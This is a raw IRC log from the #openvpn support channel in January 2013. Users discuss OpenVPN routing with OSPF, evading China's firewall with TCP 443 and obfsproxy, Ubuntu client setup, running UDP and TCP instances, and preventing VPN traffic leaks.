[Read error: Connection reset by peer] 16:02 -!- JPeterson [~JPeterson@s213-103-211-4.cust.tele2.se] has joined #openvpn 16:04 -!- bisko [~bisko@178.254.232.159] has joined #openvpn 16:07 -!- rkantos [robin@4e.fi] has quit [Ping timeout: 252 seconds] 16:14 -!- rkantos [robin@4e.fi] has joined #openvpn 16:14 -!- scyld [~scyld@unaffiliated/wasyl] has quit [Quit: Wychodzi] 16:18 -!- mbrit [~mbrit@186.120.97.194] has quit [Read error: Connection reset by peer] 16:21 -!- scyld [~scyld@unaffiliated/wasyl] has joined #openvpn 16:30 -!- mikkel [~mikkel@80-71-132-15.u.parknet.dk] has quit [Quit: Leaving] 16:35 -!- BtbN [~btbn@btbn.de] has quit [Ping timeout: 246 seconds] 16:35 -!- AsadH [~AsadH@unaffiliated/asadh] has quit [Ping timeout: 276 seconds] 16:37 -!- BtbN [~btbn@btbn.de] has joined #openvpn 16:38 -!- k1ng [~k1ng@unaffiliated/k1ng] has quit [Read error: Connection reset by peer] 16:42 -!- zz_AsadH [~AsadH@irc.unixio.com] has joined #openvpn 16:43 -!- zz_AsadH is now known as AsadH 16:43 -!- AsadH [~AsadH@irc.unixio.com] has quit [Changing host] 16:43 -!- AsadH [~AsadH@unaffiliated/asadh] has joined #openvpn 16:50 -!- k1ng [~k1ng@76.73.57.172] has joined #openvpn 16:50 -!- k1ng [~k1ng@76.73.57.172] has quit [Changing host] 16:50 -!- k1ng [~k1ng@unaffiliated/k1ng] has joined #openvpn 16:57 -!- bisko [~bisko@178.254.232.159] has quit [Quit: Computer has gone to sleep.] 17:01 -!- jthunder [~jthunder@174.3.126.51] has joined #openvpn 17:19 -!- Devastator [~devas@unaffiliated/devastator] has quit [Read error: Connection reset by peer] 17:20 -!- Devastator [~devas@186.214.14.9] has joined #openvpn 17:43 -!- mattock [~mattock@openvpn/corp/admin/mattock] has quit [Quit: ZNC - http://znc.in] 17:43 -!- raidz [~raidz@openvpn/corp/admin/andrew] has quit [Quit: I shouldn't have left....] 17:44 -!- raidz [~raidz@raidz.im] has joined #openvpn 17:44 -!- raidz [~raidz@raidz.im] has quit [Changing host] 17:44 -!- raidz [~raidz@openvpn/corp/admin/andrew] has joined #openvpn 17:44 -!- mode/#openvpn [+o raidz] by ChanServ 17:45 -!- mattock [~mattock@raidz.im] has joined #openvpn 17:45 -!- mattock [~mattock@raidz.im] has quit [Changing host] 17:45 -!- mattock [~mattock@openvpn/corp/admin/mattock] has joined #openvpn 17:45 -!- mode/#openvpn [+o mattock] by ChanServ 17:50 -!- raidz [~raidz@openvpn/corp/admin/andrew] has quit [Quit: I shouldn't have left....] 17:50 -!- mattock [~mattock@openvpn/corp/admin/mattock] has quit [Client Quit] 17:50 -!- raidz [~raidz@raidz.im] has joined #openvpn 17:50 -!- raidz [~raidz@raidz.im] has quit [Changing host] 17:50 -!- raidz [~raidz@openvpn/corp/admin/andrew] has joined #openvpn 17:50 -!- mode/#openvpn [+o raidz] by ChanServ 17:51 -!- mattock [~mattock@raidz.im] has joined #openvpn 17:51 -!- mattock [~mattock@raidz.im] has quit [Changing host] 17:51 -!- mattock [~mattock@openvpn/corp/admin/mattock] has joined #openvpn 17:51 -!- mode/#openvpn [+o mattock] by ChanServ 18:22 -!- rkantos [robin@4e.fi] has quit [Ping timeout: 245 seconds] 18:31 -!- rkantos [robin@4e.fi] has joined #openvpn 18:58 -!- rkantos [robin@4e.fi] has quit [Ping timeout: 240 seconds] 19:01 -!- rkantos [~Name@4e.fi] has joined #openvpn 19:08 -!- raidz is now known as raidz_away 19:09 -!- VunKruz [~hhhh@108-206-230-100.lightspeed.irvnca.sbcglobal.net] has quit [Ping timeout: 252 seconds] 19:14 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has joined #openvpn 19:16 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has quit [Remote host closed the connection] 19:17 -!- Carbon_Monoxide [~cmonxide@058176022144.ctinets.com] has joined #openvpn 19:31 -!- dmz [~dmz@unaffiliated/dmz] has joined #openvpn 19:32 < dmz> anyone ever used openvpn just for a network connection w/no route details on either side, just a simple p2p connection and then used bgp or other protocol to handle routing; we have multiple sites and the routing is getting dicey 19:33 -!- gffa [~unknown@unaffiliated/gffa] has quit [Quit: sleep] 19:50 -!- krzee [nobody@openvpn/community/support/krzee] has joined #openvpn 19:50 -!- mode/#openvpn [+o krzee] by ChanServ 20:10 -!- rkantos [~Name@4e.fi] has quit [Ping timeout: 276 seconds] 20:17 -!- rkantos [robin@4e.fi] has joined #openvpn 20:19 -!- VunKruz [~hhhh@108-206-230-100.lightspeed.irvnca.sbcglobal.net] has joined #openvpn 20:32 -!- goldkatze [~nobody@unaffiliated/goldkatze] has joined #openvpn 20:49 -!- Valcorb [~Valcorb@94-227-38-227.access.telenet.be] has quit [Read error: Connection reset by peer] 21:17 -!- krzee [nobody@openvpn/community/support/krzee] has quit [Ping timeout: 256 seconds] 21:32 -!- Devastator [~devas@186.214.14.9] has quit [Changing host] 21:32 -!- Devastator [~devas@unaffiliated/devastator] has joined #openvpn 21:37 -!- brute11k [~brute11k@89.249.235.94] has joined #openvpn 22:25 -!- Carbon_Monoxide [~cmonxide@058176022144.ctinets.com] has quit [Quit: Leaving] 22:34 -!- Denial [Denial@cpc15-tonb3-2-0-cust76.16-3.cable.virginmedia.com] has quit [] 22:50 -!- brute11k [~brute11k@89.249.235.94] has quit [Read error: Connection reset by peer] 23:07 -!- goldkatze [~nobody@unaffiliated/goldkatze] has quit [Ping timeout: 240 seconds] 23:15 -!- brute11k [~brute11k@89.249.235.94] has joined #openvpn 23:19 -!- brute11k [~brute11k@89.249.235.94] has quit [Read error: Connection reset by peer] 23:19 -!- brute11k [~brute11k@89.249.235.94] has joined #openvpn 23:24 -!- krzee [nobody@hemp.ircpimps.org] has joined #openvpn 23:24 -!- krzee [nobody@hemp.ircpimps.org] has quit [Changing host] 23:24 -!- krzee [nobody@openvpn/community/support/krzee] has joined #openvpn 23:24 -!- mode/#openvpn [+o krzee] by ChanServ --- Day changed Sat Jan 26 2013 00:08 -!- vpopov [~happylife@149.62.17.217] has joined #openvpn 00:14 -!- brute11k [~brute11k@89.249.235.94] has quit [Read error: Connection reset by peer] 00:15 -!- brute11k [~brute11k@89.249.235.94] has joined #openvpn 00:18 -!- brute11k [~brute11k@89.249.235.94] has quit [Client Quit] 00:22 -!- brute11k [~brute11k@89.249.235.94] has joined #openvpn 00:27 -!- vpopov [~happylife@149.62.17.217] has quit [Ping timeout: 252 seconds] 01:08 -!- mattock is now known as mattock_afk 01:25 -!- krzee [nobody@openvpn/community/support/krzee] has quit [Read error: Connection reset by peer] 01:34 -!- brute11k [~brute11k@89.249.235.94] has quit [Read error: Connection reset by peer] 01:42 -!- brute11k [~brute11k@89.249.235.94] has joined #openvpn 01:43 -!- brute11k [~brute11k@89.249.235.94] has quit [Client Quit] 01:47 -!- brute11k [~brute11k@89.249.235.94] has joined #openvpn 01:49 -!- krzee [nobody@hemp.ircpimps.org] has joined #openvpn 01:49 -!- krzee [nobody@hemp.ircpimps.org] has quit [Changing host] 01:49 -!- krzee [nobody@openvpn/community/support/krzee] has joined #openvpn 01:49 -!- mode/#openvpn [+o krzee] by ChanServ 01:57 -!- brute11k [~brute11k@89.249.235.94] has quit [Quit: Leaving.] 02:01 -!- brute11k [~brute11k@89.249.235.94] has joined #openvpn 02:07 -!- brute11k [~brute11k@89.249.235.94] has quit [Read error: Connection reset by peer] 02:09 -!- brute11k [~brute11k@89.249.235.94] has joined #openvpn 02:10 -!- brute11k [~brute11k@89.249.235.94] has quit [Client Quit] 02:18 -!- niervol [~krystian@193.106.244.150] has quit [Quit: Leaving.] 02:28 -!- MeanderingCode [~Meanderin@71-213-188-66.albq.qwest.net] has quit [Ping timeout: 252 seconds] 02:40 -!- niervol [~krystian@193.106.244.150] has joined #openvpn 02:53 -!- bisko [~bisko@178.254.232.159] has joined #openvpn 03:20 -!- brute11k [~brute11k@89.249.235.94] has joined #openvpn 03:39 -!- Porkepix [~Porkepix@lns-bzn-27-82-248-28-249.adsl.proxad.net] has quit [Ping timeout: 252 seconds] 03:42 -!- Porkepix [~Porkepix@lns-bzn-27-82-248-28-249.adsl.proxad.net] has joined #openvpn 03:43 < pppingme> dmz yep, and I use ospf 03:47 < SpookZA> me too 03:47 < SpookZA> pppingme ... do you have multiple paths or is it pure hub and spoke? 03:49 -!- defsdoor [~andy@cpc17-sutt4-2-0-cust175.perr.cable.virginmedia.com] has joined #openvpn 03:54 -!- brute11k [~brute11k@89.249.235.94] has quit [Read error: Connection reset by peer] 03:56 -!- brute11k [~brute11k@89.249.235.94] has joined #openvpn 04:02 -!- Devastator [~devas@unaffiliated/devastator] has quit [Read error: Connection reset by peer] 04:03 -!- brute11k [~brute11k@89.249.235.94] has quit [Read error: Connection reset by peer] 04:03 -!- Devastator [~devas@186.214.111.217] has joined #openvpn 04:05 -!- scyld [~scyld@unaffiliated/wasyl] has quit [Ping timeout: 245 seconds] 04:08 -!- brute11k [~brute11k@89.249.235.94] has joined #openvpn 04:08 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has joined #openvpn 04:15 -!- ade_b [~Ade@koln-4d0b1082.pool.mediaWays.net] has joined #openvpn 04:15 -!- ade_b [~Ade@koln-4d0b1082.pool.mediaWays.net] has quit [Changing host] 04:15 -!- ade_b [~Ade@redhat/adeb] has joined #openvpn 04:31 -!- brute11k [~brute11k@89.249.235.94] has quit [Read error: Connection reset by peer] 04:34 -!- brute11k [~brute11k@89.249.235.94] has joined #openvpn 05:06 -!- Denial [Denial@cpc15-tonb3-2-0-cust76.16-3.cable.virginmedia.com] has joined #openvpn 05:22 -!- goldkatze [~nobody@unaffiliated/goldkatze] has joined #openvpn 05:27 -!- bisko [~bisko@178.254.232.159] has quit [Ping timeout: 252 seconds] 05:30 -!- Eagleman [~Eagleman@546BCD9F.cm-12-4d.dynamic.ziggo.nl] has joined #openvpn 05:30 < Eagleman> Its not possible to connect to a server with a server certificate? 06:09 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has quit [Ping timeout: 255 seconds] 06:13 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has joined #openvpn 06:22 -!- brute11k [~brute11k@89.249.235.94] has quit [Read error: Connection reset by peer] 06:23 -!- BtbN [~btbn@btbn.de] has quit [Ping timeout: 264 seconds] 06:23 -!- niervol [~krystian@193.106.244.150] has quit [Quit: Leaving.] 06:25 -!- brute11k [~brute11k@89.249.235.94] has joined #openvpn 06:25 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has joined #openvpn 06:25 -!- BtbN [~btbn@btbn.de] has joined #openvpn 06:28 -!- scyld [~scyld@unaffiliated/wasyl] has joined #openvpn 06:30 -!- ak5_ [~ak5@unaffiliated/ak5] has joined #openvpn 06:31 < ak5_> hi everyone, I am trying to create a small vpn to access the web securely in China. I wanted to ask if I can use openvpn via https? 06:40 < Eagleman> Yes you can, use tcp and port 443 06:56 -!- gffa [~unknown@unaffiliated/gffa] has joined #openvpn 07:08 -!- wh1pl4sh88 [~wh1pl4sh@host-2-100-148-6.as13285.net] has quit [Ping timeout: 256 seconds] 07:10 < ak5_> Eagleman: thanks a lot. Can I also use tlspsk? 07:19 -!- lbft [~lbft@199.195.249.177] has joined #openvpn 07:33 -!- mikkel [~mikkel@80-71-132-15.u.parknet.dk] has joined #openvpn 07:56 -!- bjh4 [~bjh4@ool-4357696f.dyn.optonline.net] has joined #openvpn 08:03 -!- krzee [nobody@openvpn/community/support/krzee] has quit [Ping timeout: 240 seconds] 08:05 -!- jackbrown [~se@93-44-76-167.ip96.fastwebnet.it] has joined #openvpn 08:40 < kisom> ak5_: It depends on what ISP you use in china 08:40 <+hazardous> you may need to use obfsproxy too 08:41 < ak5_> Isee 08:41 <+hazardous> !obfs 08:41 <@vpnHelper> "obfs" is (#1) if you are looking to obfuscate your traffic to get through a firewall that recognizes and blocks openvpn, try using this proxy: obfsproxy https://www.torproject.org/projects/obfsproxy.html.en or (#2) http://community.openvpn.net/openvpn/wiki/TrafficObfuscation 08:41 < ak5_> kisom: how does this differ between ISPs in china? 08:41 < ak5_> !tlsspk 08:41 < ak5_> :( 08:41 < ak5_> still found no documentation for this, besides the spec 08:42 <+hazardous> ak5_: i presume some fuck with their network a bit more 08:42 < ak5_> probably 08:43 < ak5_> and since my office is on old military grounds I get the shittiest ISP of all: that of the military 08:44 < kisom> ak5_: in my experience it does. and i get paid to make sure a certain big company have uncensored access in china :P 08:44 < ak5_> kisom: in that case, do you use openvpn? 08:45 < kisom> ak5_: We use openvpn but we've modified the code somewhat 08:45 < ak5_> kisom: I see. Do you use tlspsk and should I? 08:45 < kisom> We use port 80 and 443 mainly, and the connection really looks like either HTTP or HTTPS 08:45 < ak5_> interesting 08:46 < ak5_> these are closed source patches I take it 08:46 < ak5_> I am learning a bit about networking, I am by no means an expert 08:46 < kisom> I assume TLSPSK (by the name of it) just takes the data and encrypts it with some PSK so it looks just like random data? 08:46 < ak5_> kisom: yes 08:46 < kisom> Then it might help 08:47 < ak5_> ok, great 08:47 < kisom> also, you can ignore packets with the RST flag set 08:47 < ak5_> kisom: another question, why use http? 08:47 < kisom> The china firewall does not block anything, it just sends RST to both ends 08:47 <+hazardous> isn't some https mitm'd anyways since iirc CNNIC and a few others are root ca's 08:48 < kisom> hazardous: We use our own CA only :) 08:48 < ak5_> I would setup my own CA as well, all I have to do is mirror one, right? 08:50 < kisom> Mirror one...? 08:50 < kisom> Just create one with openssl or similar 08:51 <+hazardous> what, mirror one? 08:52 -!- JackWinter [~jack@vodsl-4655.vo.lu] has quit [Quit: ZNC - http://znc.in] 08:54 -!- JackWinter [~jack@vodsl-4655.vo.lu] has joined #openvpn 08:54 -!- bjh4 [~bjh4@ool-4357696f.dyn.optonline.net] has quit [Remote host closed the connection] 08:56 < ak5_> hm, I mistook CA for DNS server - like I said I am a beginner, sry 08:56 < ak5_> I know now what that is :) 08:57 < rob0> "mirror" is not a DNS term either. 08:57 < ak5_> well 08:57 < ak5_> sorry 08:57 < ak5_> :) 08:58 < ak5_> 'be slave of'? 08:58 < ak5_> what should I say 08:58 < rob0> you should say what you want this nameserver to do. 08:59 -!- Valcorb [~Valcorb@199.229.249.189] has joined #openvpn 09:00 < kisom> Nice, seems you can have a network interface with Tor 09:00 < kisom> Gonna try and bridge it to my OpenVPN server 09:01 < rob0> I'm not sure how having a nameserver relates to the VPN/GFWChina issue, either. 09:02 < kisom> ak5_: By the way, SSH usually works fine in China. 09:02 < ak5_> kisom: yeah, but not for UDP 09:03 < ak5_> , right? 09:03 < kisom> SSH has built-in support for "VPNs" last time I checked 09:03 < ak5_> yes, -w 09:03 < kisom> Aka you can create a network interface to the remote machine 09:03 < rob0> ssh is TCP-only, yes 09:03 < kisom> Yes but you can still tunnel UDP over TCP. 09:03 -!- JackWinter [~jack@vodsl-4655.vo.lu] has quit [Quit: ZNC - http://znc.in] 09:04 < kisom> If that was the question. 09:04 < ak5_> but, I read this, which applies for -w but not -D or -L http://sites.inka.de/bigred/devel/tcp-tcp.html 09:04 <@vpnHelper> Title: Why TCP Over TCP Is A Bad Idea (at sites.inka.de) 09:04 < ak5_> which is why I wanted to go with openvpn instead of ssh - still unsure if that was the take-away, though :D 09:05 < kisom> Well, in my experience TCP over TCP works surprisingly well. 09:05 < rob0> TCP Over TCP Is A Bad Idea in general, not specific to the tunnel software. 09:05 -!- JackWinter [~jack@vodsl-4655.vo.lu] has joined #openvpn 09:05 < rob0> It works well if you are not losing any packets. 09:05 < ak5_> kisom: even when using flowcontrol? 09:06 < kisom> Yes 09:07 < kisom> I generally browse the web over my VPN, so yeah.. 09:09 < ak5_> hm, interesting 09:09 < ak5_> any netsec books anyone recommends? 09:12 < Eagleman> Its not possible to connect to a server with a server certificate? 09:12 -!- jackbrown [~se@93-44-76-167.ip96.fastwebnet.it] has quit [Quit: Sto andando via] 09:37 -!- mrebola [~cesar@187.245.157.97] has joined #openvpn 09:37 < mrebola> Hi everybody ! 09:37 < mrebola> Is anybody here 09:37 < mrebola> I need some help :$ 09:37 < mrebola> ? 09:38 <+hazardous> with 09:38 < mrebola> hi hazardous :D 09:38 < mrebola> thanks for asking 09:38 < mrebola> well 09:38 < mrebola> I installed openvpn in a centos server 09:38 < mrebola> with the rpm 09:38 < mrebola> was so easy to install 09:38 < mrebola> and I can configured the client in windows and mac 09:39 < mrebola> but unfortunately I use ubuntu as my major OS 09:39 < mrebola> and I cant connect to the vpn from there 09:39 < mrebola> I dont know where to take the crt o key file 09:40 < mrebola> to add in my vpn configs 09:40 < mrebola> you know the CA Certificate 09:40 < mrebola> can you help me a little , please ? 09:40 <+hazardous> i have no idea, never used ubuntu as a client unfortunately 09:40 < mrebola> or linux ? 09:41 < mrebola> think as a linux computer 09:41 < mrebola> windows and mac is so easy 09:41 < rob0> huh? 09:41 <+hazardous> i think he's trying to set up 09:41 < mrebola> hi rob0 09:41 <+hazardous> an openvpn client on ubunut 09:41 < mrebola> yep Im trying that 09:41 <+hazardous> aren't the crt and key settings just paths in the config 09:41 <+hazardous> and you can put them anywhere 09:41 < rob0> Make your config file. Put the files where it says they are. Run openvpn with that config. 09:42 -!- mcp [~mcp@wolk-project.de] has quit [Quit: ZNC - http://znc.sourceforge.net] 09:42 < rob0> Check ubuntu documentation for the quirks they have added. 09:42 < mrebola> well I installed the openvpn client and that thing ask me for the username , password and ca certificate , the last one is what I dont know where it is 09:42 < mrebola> well I tried 09:43 < mrebola> but I read I have to generate the keyfile and / or crt file 09:43 < mrebola> from a generator 09:43 < mrebola> wtha command 09:43 < mrebola> but that comand doesnt work in my computer 09:43 < mrebola> the weirdest thing is , I can use the vpn in windows and mac 09:43 < mrebola> just ubuntu is asking me for that file 09:43 <+hazardous> how are you using it in windows and mac 09:44 -!- Devastator [~devas@186.214.111.217] has quit [Changing host] 09:44 -!- Devastator [~devas@unaffiliated/devastator] has joined #openvpn 09:44 < mrebola> I just install the openvpn client and then put the user name and password 09:44 < mrebola> the client is gui 09:44 < mrebola> so I just write down my credentials 09:44 < mrebola> easy as pi 09:44 <+hazardous> apt-get install network-manager-openvpn 09:44 < mrebola> but heck linux dude , getting hard everything LOL 09:44 <+hazardous> open network manager and add an openvpn with type set to password? 09:45 < mrebola> yep thats what I have 09:45 < mrebola> network-manager-openvpn is already the newest version. 09:46 < mrebola> check this out 09:46 <+hazardous> docs say to add 'auth-user-pass' by itself on a line in openvpn conf 09:46 < mrebola> ammm 09:46 < mrebola> can you send me that link please 09:46 < mrebola> I dont remember ready anything about it 09:46 < mrebola> seems like you are about to save my ass LOL 09:49 -!- mikkel [~mikkel@80-71-132-15.u.parknet.dk] has quit [Quit: Leaving] 09:52 < mrebola> cesar@cesar-UX31E:~$ sudo find / -name "openvpn.conf" 09:52 < mrebola> nothing ! 09:52 < mrebola> this is cursed 09:53 < mrebola> cesar@cesar-UX31E:/etc/openvpn$ ls 09:53 < mrebola> client.conf 09:53 < mrebola> Think I found it 09:53 < |Mike|> good boy 09:53 < mrebola> hahaha 09:53 < mrebola> hi |Mike| 09:54 < mrebola> I feel so n00b with this thing 09:54 < |Mike|> sorry for me beeing sarcastic ;) 09:54 < mrebola> no problem :) 09:54 -!- mcp [~mcp@wolk-project.de] has joined #openvpn 09:55 < mrebola> well I dont have any auth-user-pass in my /etc/openvpn/client.conf 09:56 < mrebola> does anybody know how to run this openvpn with the network-manager-openvpn in linux / ubuntu ? 09:56 < mrebola> or everybody here is a Mac or Windows user ? 09:57 < mrebola> |Mike|: what about you? 09:58 -!- Orbi [~opera@anon-184-7.vpn.ipredator.se] has joined #openvpn 10:15 -!- mrebola [~cesar@187.245.157.97] has left #openvpn [] 10:24 < rob0> whew 10:24 < rob0> a "help vampire" has been sucking the lifeblood of #openvpn ! 10:25 < |Mike|> i detached my screen... bussy 10:26 < |Mike|> 2013/01/26 16:43:20 < mrebola> but that comand doesnt work in my computer <-- sorry, but i had to laugh about him for a bit :P 10:29 -!- vpopov [~happylife@149.62.17.217] has joined #openvpn 10:32 < rob0> Amazing how many people who don't understand computing and network basics "need" advanced network tricks like VPNs. 10:33 < |Mike|> I seen weirder stuff yesterday ;) 10:44 < frsk> I love how he started configuring OS X and Windows before even thinking about his major OS.. :-) 10:44 < |Mike|> he was lying about that frsk ;) 10:45 < frsk> Wouldn't be shocked :) 10:45 -!- mrebola [~cesar@187.245.157.97] has joined #openvpn 10:46 -!- scyld [~scyld@unaffiliated/wasyl] has quit [Quit: Wychodzi] 10:50 -!- mrebola [~cesar@187.245.157.97] has left #openvpn [] 10:58 < |Mike|> lol? 11:00 -!- Valcorb [~Valcorb@199.229.249.189] has quit [Ping timeout: 244 seconds] 11:00 -!- Valcorb [~Valcorb@94-227-38-227.access.telenet.be] has joined #openvpn 11:11 -!- wh1pl4sh88 [~wh1pl4sh@host-2-100-148-6.as13285.net] has joined #openvpn 11:13 -!- eugenmayer [~EugenMaye@HSI-KBW-109-193-196-063.hsi7.kabel-badenwuerttemberg.de] has joined #openvpn 11:13 < eugenmayer> Hello guys. pekster thank you for helping me last time (UPD issues) but my internet completly gone off.. 11:14 < eugenmayer> Since i have trouble with my ISP paket loss (from 10-25%..so useless..) iam thinking about allowing UDP and TCP connections at the same time. Is this possible? 11:16 < eugenmayer> thats how my server configuration looks like currently : http://pastie.org/5869535 11:16 < eugenmayer> proto? 11:17 < eugenmayer> If you want your OpenVPN server to listen on a TCP port instead of a UDP port, use proto tcp instead of proto udp (If you want OpenVPN to listen on both a UDP and TCP port, you must run two separate OpenVPN instances). 11:18 < eugenmayer> found this..just in case…the issue with that would be that the networks would be seperated, right. I would like to have all clients in one net, no matter they are connected using UDP or TCP 11:21 < eugenmayer> AFAICs its not possible to run 2 instances for the same net for udp/tcp for the same IP range when using routed, but it could be done using bridged? 11:21 < eugenmayer> (reading https://forums.openvpn.net/topic8207.html) 11:21 <@vpnHelper> Title: OpenVPN Support Forum Issue with multiple instance (tcp & udp) : Configuration (at forums.openvpn.net) 11:24 -!- ade_b [~Ade@redhat/adeb] has quit [Ping timeout: 240 seconds] 11:29 -!- Eagleman [~Eagleman@546BCD9F.cm-12-4d.dynamic.ziggo.nl] has quit [Ping timeout: 276 seconds] 11:30 -!- jackbrown [~se@93-44-76-167.ip96.fastwebnet.it] has joined #openvpn 11:36 -!- Orbi [~opera@anon-184-7.vpn.ipredator.se] has quit [Quit: Orbi] 11:43 < jackbrown> When I'm behind a VPN is the whols system behind it or it's possible that some program will use my normal connection revealing my IP ? 11:43 < eugenmayer> jackbrown: this is possible yes 11:45 < EugeneKay> Where "behind a VPN" means "using redirect-gateway", it is possible for a program to keep connections open using your old default gateway. New ones should pass through the vpn link, but this is not guaranteed by openvpn. 11:45 < EugeneKay> If you want to ensure no leaks occur you must use an outgoing firewall rule set(dropping all traffic except that going via the VPN, and the VPN link itself) 11:47 < jackbrown> EugeneKay: how? 11:47 < EugeneKay> man iptables 11:52 < jackbrown> EugeneKay: how can I easily check that when I'm behind a VPN nothing is using my normal connections ? 11:52 < uberushaximus> ifconfig 11:52 < jackbrown> EugeneKay: is this website enough ? http://www.dnsleaktest.com/ 11:52 <@vpnHelper> Title: DNS leak test (at www.dnsleaktest.com) 11:53 <+hazardous> netstat -anp | grep yourvpnip? 11:53 < EugeneKay> No. 11:53 < EugeneKay> !101 11:53 <@vpnHelper> "101" is This channel is not a '101' replacement for any of the following topics or others: Networking, Firewalls, Routing, Your OS, Security, etc etc 11:54 < jackbrown> EugeneKay: no ? 11:55 < EugeneKay> That website covers one possible leak. There are far more ways for them to develop. 11:56 < jackbrown> EugeneKay: that website covers web browser leaks? it that website doesn't shows any leak my http browsing is safe ? 11:57 < EugeneKay> That's not what I said; and no, that can't be guaranteed. 12:21 -!- Eagleman [~Eagleman@546BCD9F.cm-12-4d.dynamic.ziggo.nl] has joined #openvpn 12:34 < eugenmayer> Are there any tutorials on how to combine strongswan with OpenVPN? 12:34 < eugenmayer> At least by asking google it seems not to be done often (i did not find anything) 12:36 < eugenmayer> http://serverfault.com/questions/432363/strongswan-and-openvpn-together is what i found for now\ 12:36 <@vpnHelper> Title: amazon ec2 - Strongswan and OpenVPN together - Server Fault (at serverfault.com) 12:40 -!- jackbrown [~se@93-44-76-167.ip96.fastwebnet.it] has quit [Quit: Sto andando via] 12:46 < kisom> eugenmayer: "Combine"? Just set up both and create a bridge or route? 12:48 < eugenmayer> kisom: is it that easy? Just dont get me wrong, i have 5 VPN nets, lets say 10.1.0.0-10.6.0.0, 4 are routed, 1 is bridged . Now when installing strongswan lets say for the 10.1 net, i use a different subnet there, or just lets say 10.11.0.0, then push a route to those clients to use 10.1.0.1 as the default gatway? 12:48 < eugenmayer> kisom: if you as why the heck i need both..its the old story..i have clients which do not have OpenVPN clients, only IPsec. 12:50 < eugenmayer> as far as i know EugeneKay does not like any bridged setups and iam sure there are reasons. So i guess i should use the "routed" way of doing this 12:51 < EugeneKay> !whybridge 12:51 <@vpnHelper> "whybridge" is (#1) you only bridge if you want layer2 to the lan. if you want layer2 only between vpn nodes then routed tap is enough. if you only want layer3 use tun. or (#2) See this URL for a more in-depth discussion on bridging vs routing: https://community.openvpn.net/openvpn/wiki/BridgingAndRouting 12:51 -!- goldkatze [~nobody@unaffiliated/goldkatze] has quit [] 12:52 < eugenmayer> EugeneKay: in my case, the reason for tap is different. I need the device to stay alive even if the connection drops, as there are services bound to that (only) IP, and if tun goes done, this ip disapears and makes the service anvail 12:52 < eugenmayer> But iam sure thats just a very special case 12:53 < EugeneKay> I bind to eth0 and use DNAT to hop the traffic from tun0 over ;-) 12:53 < eugenmayer> Yeah know i have an issue - i did not understand a single word of what you just told me :) 12:53 < eugenmayer> (iam just honest) 12:54 < EugeneKay> At least you acknowledge that you have a problem 12:54 -!- rkantos [robin@4e.fi] has quit [Ping timeout: 245 seconds] 12:56 < pppingme> SpookZA I have two "central points" (which don't have a physical network behind them), then every "site" has a simple static (basically a key and ifconfig statement) to both central points, one of the "sites" has three connections (cable, dsl, 3g, running on three seperate linux boxes as routers), most only have one though, all the sites have an rfc1918 /24, and not a single static route anywhere, all figured out with ospf, all sites also use t 12:56 < pppingme> heir main internet connection as default route, so only learned routes go through the wan. 12:57 -!- EugeneKay [eugene@stretchmyan.us] has quit [Quit: ZNC - http://znc.in] 12:58 -!- EugeneKay [eugene@itvends.com] has joined #openvpn 13:01 -!- rkantos [robin@4e.fi] has joined #openvpn 13:13 -!- roentgen [~arthur@openvpn/community/support/roentgen] has joined #openvpn 13:30 -!- wh1pl4sh88 [~wh1pl4sh@host-2-100-148-6.as13285.net] has quit [Ping timeout: 256 seconds] 13:35 -!- rkantos [robin@4e.fi] has quit [Ping timeout: 245 seconds] 13:51 -!- rkantos [~Name@4e.fi] has joined #openvpn 14:13 -!- Porkepix [~Porkepix@lns-bzn-27-82-248-28-249.adsl.proxad.net] has quit [Ping timeout: 246 seconds] 14:16 -!- Porkepix [~Porkepix@lns-bzn-24-82-64-185-50.adsl.proxad.net] has joined #openvpn 14:16 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has quit [Ping timeout: 252 seconds] 14:21 -!- wh1pl4sh88 [~wh1pl4sh@host-2-100-148-6.as13285.net] has joined #openvpn 14:22 -!- vpopov [~happylife@149.62.17.217] has quit [Ping timeout: 252 seconds] 14:26 -!- b1rkh0ff [~b1rkh0ff@109.163.158.168] has joined #openvpn 14:29 -!- emmanuelux [~emmanuelu@vpn7.freedom-ip.com] has joined #openvpn 14:31 -!- MeanderingCode [~Meanderin@71-213-188-66.albq.qwest.net] has joined #openvpn 14:34 -!- MeanderingCode [~Meanderin@71-213-188-66.albq.qwest.net] has quit [Remote host closed the connection] 14:34 -!- MeanderingCode [~Meanderin@71-213-188-66.albq.qwest.net] has joined #openvpn 14:39 -!- Eagleman [~Eagleman@546BCD9F.cm-12-4d.dynamic.ziggo.nl] has quit [Ping timeout: 244 seconds] 14:43 -!- ScriptFanix [vincent@Hanaman.riquer.fr] has quit [Ping timeout: 245 seconds] 14:45 -!- wh1pl4sh88 [~wh1pl4sh@host-2-100-148-6.as13285.net] has quit [Ping timeout: 276 seconds] 14:46 -!- rkantos [~Name@4e.fi] has quit [Remote host closed the connection] 14:46 -!- rkantos [robin@4e.fi] has joined #openvpn 14:51 -!- brute11k [~brute11k@89.249.235.94] has quit [Quit: Leaving.] 14:58 -!- cornfeedhobo [~cornfeedh@unaffiliated/cornfeed] has quit [Quit: ZNC - http://znc.in] 14:58 -!- cornfeedhobo [~cornfeedh@unaffiliated/cornfeed] has joined #openvpn 15:07 -!- rkantos [robin@4e.fi] has quit [Ping timeout: 245 seconds] 15:14 -!- youssef [~youssef@ip-83-134-156-208.dsl.scarlet.be] has joined #openvpn 15:15 -!- bisko [~bisko@178.254.232.159] has joined #openvpn 15:24 < SpookZA> pppingme: I have 3 offices, each has a link to the other ... and it starts getting funky if one link goes down, even though each link has an iroute for both of the others :P ... my ospf works like a charm, openvpn just gets its panties in a knot 15:26 -!- rkantos [robin@4e.fi] has joined #openvpn 15:34 -!- zrzerenato [~zrzerenat@177.106.200.112] has joined #openvpn 15:34 < zrzerenato> hy every one .. 15:40 -!- zrzerenato [~zrzerenat@177.106.200.112] has left #openvpn [] 15:40 -!- zrzerenato [~zrzerenat@177.106.200.112] has joined #openvpn 15:42 -!- zrzerenato [~zrzerenat@177.106.200.112] has quit [] 15:45 -!- rkantos [robin@4e.fi] has quit [Ping timeout: 276 seconds] 15:54 -!- rkantos [robin@4e.fi] has joined #openvpn 16:17 -!- wh1pl4sh88 